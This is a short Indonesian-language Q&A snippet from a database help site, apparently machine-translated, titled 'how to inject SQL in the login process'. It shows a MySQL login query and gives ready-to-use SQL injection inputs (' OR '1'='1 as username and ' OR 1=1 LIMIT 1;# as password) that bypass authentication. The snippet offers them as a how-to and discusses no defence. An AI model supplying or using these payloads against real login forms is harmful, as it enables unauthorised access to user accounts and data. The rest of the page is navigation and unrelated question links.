Mysql
 sql >> Teknologi Basis Data >  >> RDS >> Mysql

cara menyuntikkan sql dalam proses login

Dimulai dengan kueri sasaran:

SELECT   *
FROM     users
WHERE    username = '' OR '1'='1' 
AND      password = '' OR 1=1 LIMIT 1;#'

Kami mendapatkan username adalah ' OR '1'='1 dan password adalah ' OR 1=1 LIMIT 1;#



  1. Database
  2.   
  3. Mysql
  4.   
  5. Oracle
  6.   
  7. Sqlserver
  8.   
  9. PostgreSQL
  10.   
  11. Access
  12.   
  13. SQLite
  14.   
  15. MariaDB
  1. Menghitung jumlah kueri yang dilakukan

  2. Cara membatasi nilai kolom di SQLite / MySQL

  3. MySqlConnection.StateChange tidak pernah Mengambil

  4. Jenis MySQL ENUM vs tabel gabungan

  5. tidak dapat terhubung ke buruh pelabuhan mysql dari lokal